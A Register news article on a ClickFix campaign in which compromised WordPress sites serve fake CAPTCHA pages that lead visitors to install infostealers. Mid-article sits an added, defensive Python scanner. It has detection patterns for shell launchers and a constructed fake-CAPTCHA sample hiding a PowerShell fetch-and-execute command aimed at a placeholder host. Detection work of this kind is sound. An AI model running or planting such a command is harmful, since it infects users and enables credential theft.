Crooks compromise WordPress sites, spread infostealers • The Register


Cyber baddies quietly compromised legitimate WordPress websites, including the campaign site of a US Senate candidate, turning them into launchpads for a global infostealer operation.

Researchers at Rapid7 say the scheme works by injecting malicious code into compromised sites, which then serve visitors a convincing fake Cloudflare CAPTCHA page. Instead of simply proving you’re not a robot, the prompt instructs users to copy and run a command on their machine – a step that ultimately triggers the download of credential-stealing malware.

The trick works because the attack starts on websites that otherwise look perfectly legitimate. Visitors think they’re just clearing yet another Cloudflare bot check – the sort that litters the modern web – when in fact they’re being talked through the first step of infecting their own machine.

The technique is part of the now well-worn ClickFix social engineering playbook, in which attackers persuade victims to execute commands themselves under the guise of fixing or verifying something on their systems.
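To make the mechanism above concrete, here is an added example that is not Rapid7's tooling and not code from the article: a heuristic scanner a WordPress administrator could run over wp-content to surface a ClickFix-style overlay. It relies on the generic shape of a ClickFix page (a script that writes the visitor's clipboard, instructions to press Win+R and Ctrl+V, a command hidden in a base64 literal) rather than on any indicator tied to this campaign; the two sample pages and the example.invalid host are constructed for the demonstration.

```python
"""Heuristic scan of WordPress theme/plugin/upload files for ClickFix-style
fake-CAPTCHA injections: an overlay that coaches the visitor to paste and run a
command that the page itself has placed on the clipboard.

Added example, not Rapid7's or The Register's code.  The indicators are generic
ClickFix traits (assumption), not campaign-specific IoCs; the samples are constructed."""
import base64
import re
from pathlib import Path
from typing import Dict, Iterator, List, Tuple

# No single trait is proof; the combination is what we flag (see is_suspicious).
INDICATORS: List[Tuple[str, re.Pattern]] = [
    ("clipboard_write", re.compile(r"navigator\.clipboard\.writeText|execCommand\(\s*['\"]copy['\"]\s*\)", re.I)),
    ("run_dialog_instructions", re.compile(r"win\s*\+\s*r\b|windows\s+key\s*\+\s*r\b", re.I)),
    ("paste_and_run", re.compile(r"ctrl\s*\+\s*v\b", re.I)),
    ("fake_verification", re.compile(r"verify\s+you\s+are\s+(?:a\s+)?human|verification\s+steps?|i.?m\s+not\s+a\s+robot", re.I)),
    ("base64_decode", re.compile(r"\batob\s*\(|FromBase64String", re.I)),
    ("shell_launcher", re.compile(r"\b(?:powershell|pwsh|mshta|cmd\.exe)\b|\bcurl\b[^\n]*\|\s*(?:ba)?sh\b", re.I)),
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden\b|-nop\b|-ep\s+bypass\b|-enc(?:odedcommand)?\b", re.I)),
]

ATOB_ARG = re.compile(r"atob\s*\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)")


def decode_atob_payloads(text: str) -> List[str]:
    """Decode every atob("...") literal so a command hidden in base64 can be scanned in clear."""
    out: List[str] = []
    for blob in ATOB_ARG.findall(text):
        try:
            out.append(base64.b64decode("".join(blob.split()), validate=True).decode("utf-8", "replace"))
        except ValueError:  # binascii.Error is a ValueError; skip non-base64 literals
            continue
    return out


def scan_text(text: str) -> Dict[str, int]:
    """Count indicator hits in the page text plus any payloads it would decode at runtime."""
    haystack = text + "\n" + "\n".join(decode_atob_payloads(text))
    hits = {name: len(rx.findall(haystack)) for name, rx in INDICATORS}
    return {name: n for name, n in hits.items() if n}


def is_suspicious(hits: Dict[str, int]) -> bool:
    """Flag the ClickFix shape: the page writes the clipboard AND coaches a paste-and-run,
    or it stacks three or more distinct indicators.  A genuine CAPTCHA widget or a
    'copy link' button alone does neither (assumed threshold; tune it to your corpus)."""
    coaches_run = {"run_dialog_instructions", "paste_and_run"} & hits.keys()
    return ("clipboard_write" in hits and bool(coaches_run)) or len(hits) >= 3


def scan_tree(root: Path, exts: Tuple[str, ...] = (".php", ".js", ".html")) -> Iterator[Tuple[Path, Dict[str, int]]]:
    """Walk a WordPress install (wp-content/themes, plugins, uploads) and yield flagged files."""
    for path in root.rglob("*"):
        if path.is_file() and path.suffix.lower() in exts:
            hits = scan_text(path.read_text(errors="ignore"))
            if is_suspicious(hits):
                yield path, hits


# Constructed sample of an injected overlay (not a real capture).  The command is
# base64-encoded inline so "powershell" never appears in the page source in clear.
PLANTED_CMD = 'powershell -w hidden -c "iwr https://example.invalid/x | iex"'
INJECTED_SAMPLE = f"""<div id="cf-check"><h2>Verify you are human</h2>
<ol><li>Press Win + R</li><li>Press Ctrl + V</li><li>Press Enter</li></ol></div>
<script>
const c = atob("{base64.b64encode(PLANTED_CMD.encode()).decode()}");
document.getElementById("cf-check").onclick = () => navigator.clipboard.writeText(c);
</script>"""

# Constructed benign page: a real CAPTCHA checkbox plus a legitimate "copy address" button.
BENIGN_SAMPLE = """<label><input type="checkbox"> I'm not a robot</label>
<button onclick="navigator.clipboard.writeText('info@example.invalid')">Copy address</button>"""

if __name__ == "__main__":
    for label, page in (("injected", INJECTED_SAMPLE), ("benign", BENIGN_SAMPLE)):
        hits = scan_text(page)
        print(label, "SUSPICIOUS" if is_suspicious(hits) else "ok", hits)
        for cmd in decode_atob_payloads(page):
            print("  clipboard payload:", cmd)
```

Run it against a site with `for p, h in scan_tree(Path("/var/www/html/wp-content")): print(p, h)`. Decoding the atob() literal first matters: the planted command is what reveals the hidden-window PowerShell launcher, which the raw page source never contains in clear. The benign page shows why the verdict is built on the combination rather than any single string, since a real CAPTCHA label next to a copy-to-clipboard button is normal web furniture.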

The infected sites span a broad mix of organizations. According to Rapid7, compromised pages include regional media outlets, small business websites, and “in one case even a United States Senate candidate’s official webpage.” The company says it notified US authorities to investigate the issue and clean it up.

What’s more, the scope of the activity suggests this isn’t someone manually breaking into websites one by one.

“The large-scale execution of the compromise across completely unrelated WordPress instances suggests a high level of automation by the threat actor and is likely part of an organized long-term criminal effort,” said Rapid7 security researcher Milan Spinka.

Once a victim follows the instructions on the fake verification page, the attack chain can install an infostealer – malware designed to quietly scoop up useful data from the infected machine. That typically includes browser-stored credentials, authentication cookies, cryptocurrency wallet information, and other bits of digital loot.

Those stolen credentials rarely stay with the original attacker for long. Infostealer logs are routinely packaged up and sold on cybercrime marketplaces, where other criminals can buy ready-made access to email accounts, corporate systems, and online services without having to break in themselves.

The campaign has been active in its current form since at least December 2025, although some of the infrastructure behind it – including domain registrations used in the attack chain – dates back to July and August of last year.

So far, Rapid7 says it has identified more than 250 compromised websites across at least 12 countries, including Australia, Brazil, Canada, Czechia, Germany, India, Israel, Singapore, Slovakia, Switzerland, the UK, and the US.

Using compromised websites as the delivery mechanism gives the operators a useful layer of camouflage. Security tools and users alike are far less suspicious of well-known domains than newly registered malware sites, and the attackers get to piggyback on the reputation of whoever’s unlucky enough to have their website hacked. ®
